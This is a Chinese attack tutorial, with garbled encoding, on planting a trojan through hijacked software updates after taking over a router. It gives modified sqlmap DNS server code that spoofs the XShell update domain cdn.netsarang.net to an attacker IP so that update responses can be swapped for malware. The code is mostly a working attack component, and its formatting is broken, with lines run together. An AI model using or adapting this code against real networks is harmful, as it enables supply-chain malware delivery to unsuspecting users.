很多時候?qū)δ繕诉M行滲透時一般會從web、網(wǎng)絡(luò)設(shè)備、針對性釣魚這三個方向入手。假設(shè)我們控制了目標網(wǎng)絡(luò)中的一臺網(wǎng)絡(luò)設(shè)備,如路由器,內(nèi)網(wǎng)用戶流量會從這個地方經(jīng)過我們怎么獲取其權(quán)限呢 ?
這種時候可以在路由器上抓包分析用戶流量,比如啟動xshell、notepad++等軟件時發(fā)送的更新請求包,然后我們替換軟件更新的http響應(yīng)包達到植入木馬目的。
分析流量一般用tcpdump,如果只有路由器后臺權(quán)限沒有地方可以執(zhí)行命令的話可以用DNS服務(wù)器配合HTTP代理來截獲流量。
這里就演示一下去劫持軟件更新服務(wù)器達到植入木馬的目的
一、部署DNS服務(wù)器
為了方便演示這里將受害者機器上的DNS改為攻擊者IP
下載sqlmap項目提取sqlmap\sqlmap-stable\lib\request目錄中的dns.py
執(zhí)行看看效果
在用戶機器上ping了一下,DNS服務(wù)器這邊已經(jīng)成功接收域名解析請求并響應(yīng)127.0.0.1
但是這個腳本中把所有域名解析請求都響應(yīng)成127.0.0.1
需要修改一下
我們的需求是能夠正常解析域名,再對某些指定域名進行劫持。
修改后代碼如下
#!/usr/bin/env python"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""import osimport reimport socketimport threadingimport timeimport dns.resolverclass DNSQuery(object):
"""
Used for making fake DNS resolution responses based on received
raw request
Reference(s):
http://code.activestate.com/recipes/491264-mini-fake-dns-server/
https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py
"""
def __init__(self, raw):
self._raw = raw
self._query = ""
type_ = (ord(raw[2]) >> 3) & 15 # Opcode bits
if type_ == 0: # Standard query
i = 12
j = ord(raw[i]) while j != 0:
self._query += raw[i + 1:i + j + 1] + '.'
i = i + j + 1
j = ord(raw[i]) def response(self, resolution):
"""
Crafts raw DNS resolution response packet
"""
retVal = ""
if self._query:
retVal += self._raw[:2] # Transaction ID
retVal += "\x85\x80" # Flags (Standard query response, No error) retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00" # Questions and Answers Counts
retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)] # Original Domain Name Query
retVal += "\xc0\x0c" # Pointer to domain name
retVal += "\x00\x01" # Type A
retVal += "\x00\x01" # Class IN
retVal += "\x00\x00\x00\x20" # TTL (32 seconds)
retVal += "\x00\x04" # Data length
retVal += "".join(chr(int(_)) for _ in resolution.split('.')) # 4 bytes of IP
return retValclass DNSServer(object):
def __init__(self):
self.my_resolver = dns.resolver.Resolver()
self.my_resolver.nameservers = ['8.8.8.8']
self._check_localhost()
self._requests = []
self._lock = threading.Lock() try:
self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM) except AttributeError:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(("", 53))
self._running = False
self._initialized = False
def _check_localhost(self):
response = ""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("", 53))
s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex")) # A www.google.com
response = s.recv(512) except: pass
finally: if response and "google" in response: raise socket.error("another DNS service already running on *:53") def pop(self, prefix=None, suffix=None): """
Returns received DNS resolution request (if any) that has given
prefix/suffix combination (e.g. prefix..suffix.domain)
"""
retVal = None
with self._lock: for _ in self._requests: if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I):
retVal = _
self._requests.remove(_) break
return retVal def get_domain_A(self,domain):
try:
results=self.my_resolver.query(domain,'A') for i in results.response.answer: for j in i.items: try:
ip_address = j.address if re.match('\d+\.+\d+\.+\d+\.+\d', ip_address): return ip_address except AttributeError as e: continue
except Exception as e: return '127.0.0.1'
def run(self):
"""
Runs a DNSServer instance as a daemon thread (killed by program exit)
"""
def _():
try:
self._running = True
self._initialized = True
while True:
data, addr = self._socket.recvfrom(1024)
_ = DNSQuery(data)
domain=_._query[:-1] ###### exploit
ip=self.get_domain_A(domain) if domain=='cdn.netsarang.net':
ip='192.168.80.142'
print domain,' -> ',ip
self._socket.sendto(_.response(ip), addr) with self._lock:
self._requests.append(_._query) except KeyboardInterrupt: raise
| 
